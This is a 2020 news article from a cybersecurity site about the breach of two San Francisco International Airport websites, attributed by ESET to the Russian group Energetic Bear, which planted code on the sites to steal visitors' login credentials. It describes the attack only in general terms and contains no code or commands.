• Skip to primary navigation
  • Skip to main content
  • Skip to primary sidebar
  • Skip to footer
  • Jobs
  • Career
    • Cyber Security Training
    • Work from Home
    • Cyber Security Analyst
    • Remote Work – Six Ways to Keep Your Data Safe When Working Remotely
  • Field Guide
  • Newsletter Signup
  • Deals
  • News
AskCyberSecurity.com

AskCyberSecurity.com

Cyber Security News & Information

  • Home
  • Data Privacy
    • Gamers
    • Government Cyber Security
      • Legislation
      • Standards
        • What are the risks of computer security?
        • Medical Cyber Security
    • Social Media
  • Security
    • Data Breaches
    • Scams
    • Malware
  • Software
    • Apps
    • Web Browsers
  • Glossary
    • Cyber Security Acronyms
  • About Ask Cyber Security
    • Authors
    • Contact Us
  • VPN
    • How Do I Know If My VPN is Working?
    • Best Free VPN iPhone
    • Why Use a VPN?
    • NordVPN vs IPVanish
    • Private Internet Access Download
    • Best VPN for Streaming
      • TikTok VPN
    • VPN Porn
    • Computer Security Software – What You Really Need
  • Tutorials
AskCyber Home » News » Data Breach » San Francisco Airport Data Breach Pinned on Russian Hackers

San Francisco Airport Data Breach Pinned on Russian Hackers

2020-04-15 by Max

San Francisco Airport Data Breach

Data Breach of Two San Francisco International Airport (SFO) Websites Linked to Russian Hackers

Last month two websites, SFOConnect.com and SFOConstruction.com, belonging to San Francisco International Airport (SFO) were hacked. The San Francisco airport data breach is now being pinned on hackers who are believed to be working for the Russian government according to cyber security researchers at ESET.

A data breach notice posted on both website states that the attackers “inserted malicious computer code on these websites to steal some users’ login credentials.” The malware has been removed from both sites. SFO Airport officials forced users to reset their passwords on all airport email accounts and network passwords. Anyone who has accessed either website should change their username and password.

ESET SFO Data Breach Twitter
ESET SFO Data Breach Twitter

ESET says a Russian Advanced Persistent Threat (APT) Group known as Energetic Bear, Crouching Yeti, and Energetic Bear is behind a hack of two of the airport’s websites. One of the breached websites, SFOConnect.com, a website is used by airport employees. The second websites attacked, SFOConstruction.com, is a web portal used by SFO airport construction contractors. Both websites were compromised when hackers deployed malware to steal login credentials from website visitors. According to the airport report, the goal of the attack was to steal website login credentials. But according to ESET, the goal of the attack was to steal Windows login credentials from website visitors.

“The intent was to collect Windows credentials (username/NTLM hash) of visitors by exploiting an SMB feature and the file:// prefix,” the ESET research team said.

The data breach is believed to be the work of a state-sponsored hacking group called Energetic Bear which works at the behest of the Russian government. There is no connection to Magecart malware used to steal credentials from ecommerce websites.

DHS and FBI Alert on Russian Hackers

In 2018, the US Department of Homeland Security (DHS) and the Federal Bureau of Investigation (FBI) issued a joint technical alert warning of cyberthreats from Energetic Bear. The cyberattacks targeted targeting U.S. Government entities as well as critical infrastructure organizations in the energy, nuclear, commercial facilities, water, aviation, and manufacturing sectors since at least 2016. The hackers focus primarily on organization in the Middle East, Turkey, and the United States. The alert reports that the hackers use malware and spear phishing emails to obtain remote access into IT networks. After gaining access, the hackers conducted network reconnaissance, gathered credentials , moved laterally through networks, and collected data on Industrial Control Systems (ICS).

Filed Under: Data Breach Tagged With: Russia

About Max

Max is a Data Privacy Coordinator at a major global law firm and a science fiction author residing in the Philadelphia area. He has been writing for https://www.askcybersecurity.com since early 2017.


LinkedInTwitterFacebook

Primary Sidebar

Subscribe to Our Free Newsletter

We Don't Share or Sell Your Info

Web Browsers

Where Are My Saved Passwords in Chrome?

Google Removes 70 Malicious Browser Add-ons from Chrome Web Store

Firefox 75 Reports Your Browser Settings to Mozilla

511 Tactical

WHAT TO SHOP NOW

Shop

Safeguard Your Money with a VPN

Beat the Stock Market! - Get Rule Breakers!

Malwarebytes Anti-Virus is On Sale!

Shop Kaspersky Anti-Virus

Cyber Security Field Guide

Computer Security While TravelingGet Our Cyber Security Field Guide - Available on Amazon!

Recent Posts

FTC Impersonation Scam Steals Money from Consumers

Phishing Scam Hijacks Facebook Accounts

Dating Site Data Breach Exposes 2.3M Users

Associate, Cyber Security – Cloud Job

President Biden’s Pelton: Saturday Sitrep

Categories

Cyber Security News

Phishing Scam Hijacks Facebook Accounts

… [Read More...] about Phishing Scam Hijacks Facebook Accounts

Fake eBay Notification Scam Steals Big Money

… [Read More...] about Fake eBay Notification Scam Steals Big Money

NJCCIC Announces Alice in Cyberspace 2021

… [Read More...] about NJCCIC Announces Alice in Cyberspace 2021

PayPal Phishing Scam Steals Accounts

… [Read More...] about PayPal Phishing Scam Steals Accounts

More Cyber Security News

Tags

amazon Android Apple bitcoin China chrome CISA Coronavirus credit card Cyber Attack DHS DOJ Equifax Europe Facebook FBI Firefox FTC games GDPR Google Government hacker identity theft India iPhone Iran IRS Microsoft North Korea password PayPal phishing phishing email ransomware Russia smartphone tax scam TikTok tutorial VPN WhatsApp WiFi Windows Zoom

Government

FTC Releases Cyber Threat Video Playlist

Malware Found on US Government Funded Phones

UK NCA Reaches Out to Youth to Deter Cybercrimes

Texas DOT Hit by Ransomware Attack

More Posts from this Category

Footer

Menu

  • Home
  • About
  • Authors
  • Newsletter Signup
  • PRIVACY POLICY

Search

Why Use a VPN?

NordVPN vs IPVanish VPN Review

NAVIGATION

  • Data Breaches
  • Data Privacy
  • Gamers
  • Scams
  • Malware

MEMBER NJCCIC

New Jersey Cybersecurity & Communications Integration Cell

STAY CONNECTED

  • Facebook
  • Instagram
  • Pinterest
  • YouTube
  • Twitter
  • RSS

Copyright © 2021 · AskCyberSecurity.com · METRONY, LLC

Go to mobile version